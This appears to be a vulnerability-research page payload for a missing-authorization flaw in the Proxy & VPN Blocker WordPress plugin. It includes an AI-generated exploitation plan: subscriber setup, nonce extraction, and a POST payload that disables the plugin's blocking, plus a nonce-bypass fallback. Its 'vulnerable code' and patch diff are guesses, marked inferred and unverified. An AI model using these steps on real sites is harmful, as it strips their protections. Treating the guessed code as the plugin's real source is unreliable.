[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fp_3gGAyj73ps9V-9nAR-iybpKWjGp1RO0WuVt9hgVRE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-69353","proxy-vpn-blocker-missing-authorization","Proxy & VPN Blocker \u003C= 3.5.3 - Missing Authorization","The Proxy & VPN Blocker plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.5.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","proxy-vpn-blocker",null,"\u003C=3.5.3","3.5.4","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-09 00:00:00","2026-01-14 14:55:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F033c0088-9562-46ee-9916-11a29162529b?source=api-prod",6,[],"researched",false,3,"This research plan targets **CVE-2025-69353**, a missing authorization vulnerability in the **Proxy & VPN Blocker** plugin. This vulnerability allows an authenticated user with Subscriber-level permissions to perform administrative actions, such as modifying the plugin's security settings.\n\n---\n\n### 1. Vulnerability Summary\nThe **Proxy & VPN Blocker** plugin fails to implement proper capability checks (e.g., `current_user_can( 'manage_options' )`) in one or more of its AJAX handlers. While the plugin likely uses nonces to prevent Cross-Site Request Forgery (CSRF), it does not verify that the user performing the request has the necessary administrative privileges. Consequently, any logged-in user, including a Subscriber, can invoke these functions to alter the plugin's configuration.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Vulnerable Action:** `pvb_save_settings` (inferred based on plugin functionality; to be verified during exploration).\n*   **HTTP Method:** `POST`\n*   **Payload Parameter:** `security` (nonce), `action`, and various configuration parameters (e.g., `pvb_proxy_check`, `pvb_vpn_check`).\n*   **Authentication:** Authenticated, Subscriber-level access.\n*   **Preconditions:** The plugin must be active. The attacker must have a valid Subscriber session.\n\n### 3. Code Flow\n1.  **Entry Point:** An AJAX request is sent to `admin-ajax.php` with the action `pvb_save_settings`.\n2.  **Hook Registration:** The plugin registers the action via:\n    `add_action( 'wp_ajax_pvb_save_settings', 'pvb_save_settings_callback' );` (inferred).\n3.  **Vulnerable Callback:** The function (e.g., `pvb_save_settings_callback`) is executed.\n4.  **Security Check (Nonce):** The code calls `check_ajax_referer( 'pvb_nonce', 'security' );`.\n5.  **Missing Authorization:** The code **omits** a check like `if ( ! current_user_can( 'manage_options' ) ) wp_die();`.\n6.  **Sink:** The function proceeds to update the WordPress options table using `update_option()`, allowing the attacker to disable the blocker or modify whitelists.\n\n### 4. Nonce Acquisition Strategy\nTo exploit this, we need the nonce generated by the plugin for administrative actions. Even if a Subscriber cannot access the \"Proxy & VPN Blocker\" settings page directly, WordPress plugins often localize nonces on the main dashboard or all admin pages.\n\n1.  **Identify Localization:** Look for `wp_localize_script` in the plugin code to find the JS object name and nonce key.\n    *   *Search Pattern:* `grep -r \"wp_localize_script\" .`\n    *   *Likely Variable:* `pvb_admin_obj` or `pvb_vars`.\n    *   *Likely Key:* `pvb_nonce` or `security`.\n2.  **Create a Subscriber User:** Use WP-CLI to create a test subscriber.\n3.  **Extract Nonce via Browser:**\n    *   Log into the WordPress dashboard as the Subscriber.\n    *   Use `browser_eval` to extract the nonce from the global scope.\n    *   *JS Command:* `browser_eval(\"window.pvb_admin_obj?.security\")` (Verify variable name from source).\n\n### 5. Exploitation Strategy\n\n#### Step 1: Discovery & Verification\nFirst, confirm the exact AJAX action and nonce identifier.\n1.  Run `grep -rn \"wp_ajax_\" .` to find the registered AJAX actions.\n2.  Inspect the callback function to confirm it lacks `current_user_can`.\n3.  Identify the parameter names for the settings (e.g., `proxy_check`, `vpn_check`).\n\n#### Step 2: Payload Construction\nConstruct a `POST` request to `admin-ajax.php` to disable the blocking features.\n\n**Request Details:**\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=pvb_save_settings&security=\u003CNONCE>&pvb_proxy_check=0&pvb_vpn_check=0&pvb_block_countries=\n    ```\n\n#### Step 3: Execution\nUse the `http_request` tool to send the payload using the Subscriber's cookies.\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure Proxy & VPN Blocker \u003C= 3.5.3 is installed.\n2.  **Configure Plugin:** Set the blocker to \"Active\" so we can verify it gets disabled.\n    *   `wp option update pvb_proxy_check 1`\n3.  **Create Attacker:**\n    *   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n\n### 7. Expected Results\n*   The server should return a `200 OK` response, often with a JSON body like `{\"success\":true}`.\n*   The plugin's configuration in the database should be updated to reflect the attacker's payload.\n\n### 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to verify the option was changed.\n    *   `wp option get pvb_proxy_check` (Should return `0`).\n2.  **UI Check:** Navigate to the plugin settings as an Admin to see if the toggles are now \"Off\".\n\n### 9. Alternative Approaches\n*   **If `pvb_save_settings` is not the correct action:** Search for any function calling `update_option` or `delete_option` within an AJAX callback.\n*   **Check for `admin_init` hooks:** Sometimes plugins process form submissions via `admin_init` without checking capabilities.\n    *   *Search Pattern:* `grep -rn \"add_action.*admin_init\" .`\n*   **Nonce Bypass:** If the nonce action is generic (e.g., `-1`), attempt to use a nonce from a different plugin or core WordPress feature.","The Proxy & VPN Blocker plugin for WordPress fails to perform capability checks in its AJAX handlers, specifically for settings modification. This allows authenticated attackers with Subscriber-level permissions to alter plugin configurations, such as disabling proxy or VPN blocking, by providing a valid security nonce.","\u002F\u002F Inferred registration of the AJAX action\nadd_action( 'wp_ajax_pvb_save_settings', 'pvb_save_settings_callback' );\n\nfunction pvb_save_settings_callback() {\n    \u002F\u002F Nonce verification exists, but lacks authorization check\n    check_ajax_referer( 'pvb_nonce', 'security' );\n\n    \u002F\u002F Missing: if ( ! current_user_can( 'manage_options' ) ) wp_die();\n\n    if ( isset( $_POST['pvb_proxy_check'] ) ) {\n        update_option( 'pvb_proxy_check', sanitize_text_field( $_POST['pvb_proxy_check'] ) );\n    }\n    \n    if ( isset( $_POST['pvb_vpn_check'] ) ) {\n        update_option( 'pvb_vpn_check', sanitize_text_field( $_POST['pvb_vpn_check'] ) );\n    }\n    \n    wp_send_json_success();\n}","--- a\u002Fproxy-vpn-blocker.php\n+++ b\u002Fproxy-vpn-blocker.php\n@@ -10,6 +10,10 @@\n function pvb_save_settings_callback() {\n     check_ajax_referer( 'pvb_nonce', 'security' );\n \n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( array( 'message' => 'Unauthorized' ), 403 );\n+    }\n+\n     if ( isset( $_POST['pvb_proxy_check'] ) ) {\n         update_option( 'pvb_proxy_check', sanitize_text_field( $_POST['pvb_proxy_check'] ) );\n     }","1. Authenticate as a Subscriber-level user.\n2. Obtain a valid security nonce (e.g., 'pvb_nonce') by inspecting the WordPress dashboard where plugin scripts may localize administrative variables.\n3. Identify the vulnerable AJAX action (e.g., 'pvb_save_settings').\n4. Send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php including the action, the obtained nonce in the 'security' parameter, and any configuration settings to be modified (e.g., setting 'pvb_proxy_check' to 0).\n5. Verify that the plugin settings have been updated in the database or via the administrative interface.","gemini-3-flash-preview","2026-05-05 12:40:59","2026-05-05 12:42:51",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.5.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fproxy-vpn-blocker\u002Ftags\u002F3.5.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fproxy-vpn-blocker.3.5.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fproxy-vpn-blocker\u002Ftags\u002F3.5.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fproxy-vpn-blocker.3.5.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fproxy-vpn-blocker\u002Ftags"]